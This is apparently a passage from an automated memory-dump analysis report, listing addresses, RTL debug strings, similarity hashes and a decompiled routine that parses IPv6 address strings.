                                                                                                                                                        0x01fd2501
                                                                                                                                                        0x01fd2503
                                                                                                                                                        0x01fd2506
                                                                                                                                                        0x01fd250b
                                                                                                                                                        0x01f9eb8c
                                                                                                                                                        0x01f9eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f9eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f9eb99
                                                                                                                                                        0x01f9ec85
                                                                                                                                                        0x01f9ec85
                                                                                                                                                        0x01f9ec85
                                                                                                                                                        0x00000000

                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01FD24BD
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 01FD24FA
                                                                                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01FD248D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                        • API String ID: 0-3177188983
                                                                                                                                                        • Opcode ID: c015c7ae654095d0ffb38879b9d948679d8200aaf4b4b67047fe66818fa35c4a
                                                                                                                                                        • Instruction ID: 603ae29aa05632830ad76e2e9360052b06ac5c0c235692252f73631b10647e54
                                                                                                                                                        • Opcode Fuzzy Hash: c015c7ae654095d0ffb38879b9d948679d8200aaf4b4b67047fe66818fa35c4a
                                                                                                                                                        • Instruction Fuzzy Hash: BA410A71A00705EBDB20EF68CD84F7A77B9EF45720F148605FA559B2C2D632E941C7A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01FAFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E01FAFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E01FAEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E01FAEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E01FA685D(_t167, 4) == 0) {
								if(E01FA685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E01FA685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E01FA685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E01F88980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01F7DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E01FAEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E01FAEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                        0x01fafcd1
                                                                                                                                                        0x01fafcd6
                                                                                                                                                        0x01fafcd9
                                                                                                                                                        0x01fafcdc
                                                                                                                                                        0x01fafcdf
                                                                                                                                                        0x01fafce2
                                                                                                                                                        0x01fafce5
                                                                                                                                                        0x01fafce8
                                                                                                                                                        0x01fafceb
                                                                                                                                                        0x01fafced
                                                                                                                                                        0x01fafced
                                                                                                                                                        0x01fafcf3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafcfc
                                                                                                                                                        0x01fafcfe
                                                                                                                                                        0x01fafdc1
                                                                                                                                                        0x01fdecbd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeccc
                                                                                                                                                        0x01fdeccc
                                                                                                                                                        0x01fdecd2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdecdf
                                                                                                                                                        0x01fdece0
                                                                                                                                                        0x01fdece4
                                                                                                                                                        0x01fdeceb
                                                                                                                                                        0x01fdecee
                                                                                                                                                        0x01fdeca8
                                                                                                                                                        0x01fdeca8
                                                                                                                                                        0x01fdecaa
                                                                                                                                                        0x01fafd76
                                                                                                                                                        0x01fafd79
                                                                                                                                                        0x01fafdb4
                                                                                                                                                        0x01fafdb5
                                                                                                                                                        0x01fafdb6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafdb6
                                                                                                                                                        0x01fafd7e
                                                                                                                                                        0x01fdecfc
                                                                                                                                                        0x01fafe2f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafe2f
                                                                                                                                                        0x01fded08
                                                                                                                                                        0x01fded0f
                                                                                                                                                        0x01fded17
                                                                                                                                                        0x01fded1b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fded1b
                                                                                                                                                        0x01fafd88
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafd94
                                                                                                                                                        0x01fafd99
                                                                                                                                                        0x01fafda1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafdb0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafdb0
                                                                                                                                                        0x01fdecbd
                                                                                                                                                        0x01fafdc7
                                                                                                                                                        0x01fafdcb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafdd7
                                                                                                                                                        0x01fafde3
                                                                                                                                                        0x01fafe06
                                                                                                                                                        0x01fc1fe7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc1fef
                                                                                                                                                        0x01fc1ff0
                                                                                                                                                        0x01fc1ff4
                                                                                                                                                        0x01fc1ff7
                                                                                                                                                        0x01fc1ffa
                                                                                                                                                        0x01fc1ffd
                                                                                                                                                        0x01fc2000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdecf1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdecf1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafe06
                                                                                                                                                        0x01fafde8
                                                                                                                                                        0x01fafdec
                                                                                                                                                        0x01fafdef
                                                                                                                                                        0x01fafdf2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafdf2
                                                                                                                                                        0x01fafdcb
                                                                                                                                                        0x01fafd04
                                                                                                                                                        0x01fafd05
                                                                                                                                                        0x01fdec67
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdec6f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdec6f
                                                                                                                                                        0x01fafd13
                                                                                                                                                        0x01fafd3c
                                                                                                                                                        0x01fafd40
                                                                                                                                                        0x01fdec75
                                                                                                                                                        0x01fdec7a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdec8a
                                                                                                                                                        0x01fdec8a
                                                                                                                                                        0x01fdec90
                                                                                                                                                        0x01fdecb2
                                                                                                                                                        0x01fafd73
                                                                                                                                                        0x01fafd73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafd73
                                                                                                                                                        0x01fdec95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeca1
                                                                                                                                                        0x01fdeca4
                                                                                                                                                        0x01fdeca5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeca5
                                                                                                                                                        0x01fdec7a
                                                                                                                                                        0x01fafd4a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafd6e
                                                                                                                                                        0x01fafd6e
                                                                                                                                                        0x01fafd71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafd71
                                                                                                                                                        0x01fafd4a
                                                                                                                                                        0x01fafd21
                                                                                                                                                        0x01fba3a1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fba3a1
                                                                                                                                                        0x01fafd36
                                                                                                                                                        0x01fc200b
                                                                                                                                                        0x01fc2012
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc2018
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc2018
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fafd36
                                                                                                                                                        0x01fafe0f
                                                                                                                                                        0x01fafe16
                                                                                                                                                        0x01fba3ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fba3b3
                                                                                                                                                        0x01fba3b3
                                                                                                                                                        0x01fafe1f
                                                                                                                                                        0x01fded25
                                                                                                                                                        0x01fded86
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fded91
                                                                                                                                                        0x01fded95
                                                                                                                                                        0x01fded95
                                                                                                                                                        0x01fded9a
                                                                                                                                                        0x01fdedad
                                                                                                                                                        0x01fdedb3
                                                                                                                                                        0x01fdedba
                                                                                                                                                        0x01fdedc4
                                                                                                                                                        0x01fdedc9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdedcc
                                                                                                                                                        0x01fded2a
                                                                                                                                                        0x01fded55
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fded61
                                                                                                                                                        0x01fded66
                                                                                                                                                        0x01fded6e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fded7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fded7d
                                                                                                                                                        0x01fded30
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fded3c
                                                                                                                                                        0x01fded43
                                                                                                                                                        0x01fded4b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3965848254-0
                                                                                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction ID: d2f2cb8100af77b868a69a99b2a040054c5078c8bd814cde7ba8e4eb19fe2db0
                                                                                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction Fuzzy Hash: 7091D1B1D0020AEEDF25CF58C8856FEBBB4FF40704FA4806AD651AB252E7364A41CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%